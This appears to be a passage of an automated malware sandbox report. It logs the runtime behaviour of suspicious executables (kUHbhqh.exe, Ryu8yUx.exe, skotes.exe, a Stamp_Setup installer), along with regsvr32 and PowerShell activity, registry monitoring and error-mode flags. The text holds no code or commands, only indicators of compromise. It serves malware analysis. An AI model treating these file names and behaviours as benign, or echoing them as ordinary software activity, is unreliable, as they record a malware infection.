                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\5DE5DBEEB8842160759410C027360065 526bb96598261ff65a7840a94d23109bJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
